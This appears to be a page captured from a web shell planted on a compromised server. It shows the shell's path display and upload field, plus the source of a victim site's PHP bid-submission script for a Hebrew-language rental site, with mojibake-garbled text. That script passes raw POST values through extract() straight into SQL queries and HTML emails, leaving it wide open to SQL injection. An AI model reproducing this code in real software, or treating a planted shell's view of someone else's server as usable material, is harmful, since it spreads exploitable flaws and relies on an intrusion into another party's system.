?

แEำ๊คฮ๏Lwebshll2019

Current Path : /home/webyoo/www/backup/allback/docteur-site/cv/sym/a/leumi/site/
Upload File :
Current File : /home/webyoo/www/backup/allback/docteur-site/cv/sym/a/leumi/site/insert_new_bid.php

<?php
include "start.php";
include "send_email.php";
extract($_POST);
// print_r($_POST);
$id = isset($_POST['bid_id']) && !empty($_POST['bid_id']) ? $_POST['bid_id'] : 0;
$id_user=$_SESSION['user']['id'];

// Rรฉcupรฉrer l'email de l'utilisateur
$user_query = mysqli_query($link, "SELECT email, name FROM rent_users WHERE id = ".$id_user);
$user_data = mysqli_fetch_array($user_query, MYSQLI_ASSOC);
$user_email = $user_data['email'];
$user_name = $user_data['name'];

if($id > 0){
    $query = mysqli_query($link,"UPDATE rent_bids SET id_property = '".$id_property."', id_user = '".$id_user."', amount = '".$amount."', family = '".$family."', nb_souls_under18 = '".$nb_souls_under18."', nb_souls_over18 = '".$nb_souls_over18."', employment = '".$employment."', long_term = '".$long_term."', pets = '".$pets."', expect_property = '".$expect_property."', tikounim = '".$tikounim."', invoice = '".$invoice."', message = '".$message."' WHERE id = ".$id);
    $row = mysqli_fetch_array($query, MYSQLI_ASSOC);
}else{
    echo $s = "INSERT INTO rent_bids SET id_property = '".$id_property."', id_user = '".$id_user."', amount = '".$amount."', family = '".$family."', nb_souls_under18 = '".$nb_souls_under18."', nb_souls_over18 = '".$nb_souls_over18."', employment = '".$employment."', long_term = '".$long_term."', pets = '".$pets."', expect_property = '".$expect_property."', tikounim = '".$tikounim."', invoice = '".$invoice."', message = '".$message."', date_bid = NOW()";
    $query = mysqli_query($link, $s);
    $row = mysqli_fetch_array($query, MYSQLI_ASSOC);
    
    
}

// Envoi d'email de confirmation
    if($query) {
        $subject = "ืชื•ื“ื” ืขืœ ื”ื”ืฆืขื” ืฉืœืš";
        $email_message = "<html><head><meta charset='UTF-8'></head><body dir='rtl'>";
        $email_message .= "<h2>ืฉืœื•ื ".$user_name.",</h2>";
        $email_message .= "<p>ืชื•ื“ื” ืขืœ ื”ื”ืฆืขื” ืฉืœืš ืขื‘ื•ืจ ื”ื ื›ืก.</p>";
        $email_message .= "<p>ื”ื”ืฆืขื” ืฉืœืš ื ืฉืœื—ื” ื‘ื”ืฆืœื—ื” ืœื‘ืขืœ ื”ื ื›ืก.</p>";
        $email_message .= "<p>ืกื›ื•ื ื”ื”ืฆืขื”: โ‚ช".$amount."</p>";
        $email_message .= "</body></html>";
        
        sendEmail($user_email, $subject, $email_message, 'ืืฉื›ืจื” - ืชื•ื“ื” ืขืœ ื”ื”ืฆืขื”');

        //envoi d'email au propriรฉtaire du bien
        $property_query = mysqli_query($link, "SELECT ru.id as id, ru.email AS email, ru.name as name FROM rent_properties rp JOIN rent_users ru ON rp.id_user = ru.id WHERE rp.id_property = ".$id_property);
        $property_data = mysqli_fetch_array($property_query, MYSQLI_ASSOC);
        $owner_email = $property_data['email'];
        $owner_name = $property_data['name'];
        $owner_id = $property_data['id'];
        $owner_subject = "ื”ืฆืขื” ื—ื“ืฉื” ืœื ื›ืก ืฉืœืš";
        $owner_email_message = "<html><head><meta charset='UTF-8'></head><body dir='rtl'>";
        $owner_email_message .= "<h2>ืฉืœื•ื ".$owner_name.",</h2>";   
        $owner_email_message .= "<p>ืงื™ื‘ืœืช ื”ืฆืขื” ื—ื“ืฉื” ืขื‘ื•ืจ ื”ื ื›ืก ืฉืœืš ืžืืช ".$user_name.".</p>";
        $owner_email_message .= "<p>ืกื›ื•ื ื”ื”ืฆืขื”: โ‚ช".$amount."</p>";
        $owner_email_message .= "</body></html>";
        sendEmail($owner_email, $owner_subject, $owner_email_message, 'ืืฉื›ืจื” - ื”ืฆืขื” ื—ื“ืฉื” ืœื ื›ืก ืฉืœืš');

        $insert = mysqli_query($link, "INSERT INTO rent_messages SET id_property = '".$id_property."', id_receiver = '".$owner_id."', id_sender = '".$_SESSION['user']['id']."', id_bid = '".$idbid."', subject = 'ื”ื•ื“ืขื” ื—ื“ืฉื”', message = '".mysqli_real_escape_string($link, "<p>ืงื™ื‘ืœืช ื”ืฆืขื” ื—ื“ืฉื” ืขื‘ื•ืจ ื”ื ื›ืก ืฉืœืš ืžืืช ".$user_name.".</p><p>ืกื›ื•ื ื”ื”ืฆืขื”: โ‚ช".$amount."</p>")."', date_message = NOW()");
    }
?>



web shell, Coded By 2019